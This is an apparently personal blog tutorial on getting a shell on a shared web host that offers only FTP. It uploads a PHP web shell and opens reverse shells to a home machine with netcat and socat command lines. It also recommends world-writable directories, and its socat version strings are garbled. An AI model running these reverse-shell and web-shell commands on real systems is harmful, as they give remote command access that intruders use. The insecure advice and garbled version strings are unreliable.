Sometimes you purchase a web host and the only thing you have to control it, is an ftp account. For those familiar with unix-like shells, it would be really cool to have an SSH session on your account, but most of web hosts don’t allow this option. It makes the life much easier for maintaining the files and permissions.
First step is to investigate whether your php service bans the functions to execute a process or not. I’m talking about the exec and system and popen function series. You may write your own test or install a php script called “PHP Shell”. PHP Shell receives the shell commands through the web browser and executes them and finally delivers the output right at the browser window. There are lots of php shells out there. I used this one developed by Martin Geisler. Download one of them and upload it using your ftp account.
For simple operations, you can get an interactive shell using GNU netcat (Note the GNU word, there are lots of other versions and most of them do not support executing commands). If you run the following command on your machine, it would create a simple tcp listener on an specific port :
netcat -l -p 8999 -v
As you see, we have provided the verbose option to get notified when some one connects to your listener. Then by running the following line, we can the simply connect from the phpshell to our local listener and receive a shell :
netcat my.pc.ip.address 8999 -e “/bin/bash -i”
The above netcat command will connect to your pc at home and execute an interactive bash shell. At this stage you have a command and see the resulting shell (i call it semi interactive). Soon you’ll notice that special terminal commands such as Ctrl+D, Ctrl+C and arrow keys don’t work as expected.
We’ll use socat to overcome this problem. socat can connect almost every two streams you find in the world. From files to sockets, Terminals to udp connections, process output to tcp connection and it supports SSL connections too. But it is not installed on most distributions by default. So the first step is to get the source and compile it. We need it both on our local pc and on the web server. Well, the pc part is easy, but for the web server side you should first find out that whether the build tools (compiler, make, etc) are installed on the web server or not. Test it simply by running g++ and make in your php shell. If yes, you’re all set and follow these steps to get it running :
- run wget http://www.dest-unreach.org/socat/download/socat-184.108.40.206.tar.gz
- extract the file using tar -xf socat-220.127.116.11.tar.gz
- cd socat-1.7.13
if everything went smoothly and fine, you would have the socat binary right under the socat-1.7.13 folder. Note that if your web host doesn’t have the build tools installed, you should compile the package locally and upload the binary file. The final part is to setup the listener, this time using socat and connect to it from the webhost, run the following command to get the listener :
socat file:`tty`,raw,echo=0 tcp-listen:8999
and run this one from the php-shell to get the terminal.
./socat tcp-connect:my.pc.ip.address:80 exec:’bash -li’,pty,stderr,setsid,sigint,sane
The first socat command, connected a tcp socket (which is yet listening) to your current TTY and second one, connects the bash process to your tcp listener. Now, you have a fully functional TTY Terminal connected to your account in the web-host. Almost all terminal commands work and you can run vim, nano, screen and Midnight commander 😎 . There are few differences between an SSH session and this reverse shell. The most important ones are :
- Your session is not encrypted, you may use SSL capabilities of socat
- SSH automatically forwards some of useful shell variables, you may set them your self or put them in the .bash_profile or .bash_rc of the web hosting account, such as
- For simplicity purposes, you may put the second socat command line in a new php script to avoid using php shell each time. Note that you should either secure your php shell or delete it when everything finished to avoid others, access your account.
- Some web servers run using a different user id than your current account. It would cause that you don’t have permission to create and edit files using the php shell. In such situations, creating a world wide writable directory (Enable All Permissions for All) would do the job.